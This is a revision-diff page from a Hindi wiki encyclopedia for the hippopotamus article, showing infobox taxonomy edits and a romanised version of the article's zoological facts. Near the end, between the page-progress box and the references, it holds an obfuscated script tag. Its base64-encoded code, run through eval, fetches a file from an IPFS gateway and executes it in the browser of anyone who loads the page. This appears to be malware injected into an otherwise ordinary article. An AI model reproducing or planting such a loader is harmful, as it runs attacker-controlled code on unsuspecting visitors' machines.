Difference between revisions of "दरियाई घोड़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} {{सूचना बक्सा जीव जन्तु |चित्र=Hippopotamus.jpg |चित...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{सूचना बक्सा जीव जन्तु
 
{{सूचना बक्सा जीव जन्तु
 
|चित्र=Hippopotamus.jpg
 
|चित्र=Hippopotamus.jpg
Line 10: Line 9:
 
|उपगण=
 
|उपगण=
 
|अधिकुल=
 
|अधिकुल=
|कुल=
+
|कुल=हिप्पोपोटेमाइडी (Hippopotamidae)
|प्रजाति=ह. ऐम्फ़िबियस
+
|प्रजाति=हिपोपोटैमस (Hippopotamus)
|जाति=हिपोपोटैमस
+
|जाति=ऐम्फ़िबियस (amphibius)
 
|द्विपद नाम=हिपोपोटैमस ऐम्फ़िबियस
 
|द्विपद नाम=हिपोपोटैमस ऐम्फ़िबियस
 
|संबंधित लेख=
 
|संबंधित लेख=
Line 19: Line 18:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=दरियाई घोड़ा के पसीने का [[रंग]] [[लाल रंग|लाल]] होता है।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
Line 25: Line 24:
 
*उष्णटिबंधीय [[अफ़्रीका]] की अधिकतम नदियों में पाया जाने वाला सामान्य दरियाई घोड़ा का जंतु वैज्ञानिक नाम '''हिपोपोटैमस ऐम्फ़िबियस''' (Hippopotamus amphibius) है।   
 
*उष्णटिबंधीय [[अफ़्रीका]] की अधिकतम नदियों में पाया जाने वाला सामान्य दरियाई घोड़ा का जंतु वैज्ञानिक नाम '''हिपोपोटैमस ऐम्फ़िबियस''' (Hippopotamus amphibius) है।   
 
*दरियाई घोड़ा एक बड़ा, भारी और छोटी टाँगों वाला रात्रिचर, शाकाहारी, खुरदार स्तनी है जो 4 मीटर लम्बा और 4 टन तक भार का होता है।  
 
*दरियाई घोड़ा एक बड़ा, भारी और छोटी टाँगों वाला रात्रिचर, शाकाहारी, खुरदार स्तनी है जो 4 मीटर लम्बा और 4 टन तक भार का होता है।  
*दरियाई घोड़ा छोटे समूहों में रहता है तथा दिन के समय [[जल]] में रहकर रात्रि को रांने के लिए बाहर आता है।  
+
*दरियाई घोड़ा छोटे समूहों में रहता है तथा दिन के समय [[जल]] में रहकर रात्रि को खाने के लिए बाहर आता है।  
 
*दरियाई घोड़ा की थूथन बहुत चौड़ी होती है।  
 
*दरियाई घोड़ा की थूथन बहुत चौड़ी होती है।  
 
*नासारंध्र, नेत्र और सिर की पृष्ठ ओर स्थित छोटा कर्ण जलमग्न जीवन के अनुकूल होता हैं।  
 
*नासारंध्र, नेत्र और सिर की पृष्ठ ओर स्थित छोटा कर्ण जलमग्न जीवन के अनुकूल होता हैं।  
Line 46: Line 45:
 
[[Category:स्तनधारी जीव]][[Category:प्राणि विज्ञान]][[Category:विज्ञान कोश]]
 
[[Category:स्तनधारी जीव]][[Category:प्राणि विज्ञान]][[Category:विज्ञान कोश]]
 
[[Category:वन्य प्राणी]]
 
[[Category:वन्य प्राणी]]
[[Category:नया पन्ना सितंबर-2011]]
 
  
 
__INDEX__
 
__INDEX__

Revision as of 07:21, 1 October 2011

dariyaee gho da
jagat jiv - jantu
sangh k aaurdeta (Chordata)
varg stanapayi (Mammalia)
gan artiyodaiktaila (Artiodactyla)
kul hippopotemaidi (Hippopotamidae)
jati aimfibiyas (amphibius)
prajati hipopotaimas (Hippopotamus)
dvipad nam hipopotaimas aimfibiyas
any janakari dariyaee gho da ke pasine ka rang lal hota hai.
  • ushnatibandhiy afrika ki adhikatam nadiyoan mean paya jane vala samany dariyaee gho da ka jantu vaijnanik nam hipopotaimas aimfibiyas (Hippopotamus amphibius) hai.
  • dariyaee gho da ek b da, bhari aur chhoti taangoan vala ratrichar, shakahari, khuradar stani hai jo 4 mitar lamba aur 4 tan tak bhar ka hota hai.
  • dariyaee gho da chhote samoohoan mean rahata hai tatha din ke samay jal mean rahakar ratri ko khane ke lie bahar ata hai.
  • dariyaee gho da ki thoothan bahut chau di hoti hai.
  • nasarandhr, netr aur sir ki prishth or sthit chhota karn jalamagn jivan ke anukool hota haian.
  • tanik se jalayukt prayokt pair mean 4 khuradar aangoothe hote haian.
  • thode baloan aur niche vasa ke ek mote star sahit tvacha 5 semi moti hoti hai.
  • dariyaee gho da ke pasine ka rang lal hota hai.
  • saan d apane gajadant-saman nichale radanakoan ko shastroan ki bhaanti prayog karake l date hai.
  • dariyaee gho da achchhe tairak aur gotakhor hote hai.
  • vaman dariyaee gho da kiropasis laibariensis kandhoan par keval 60 semi ooancha hota hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

  1. REDIRECT saancha:jiv jantu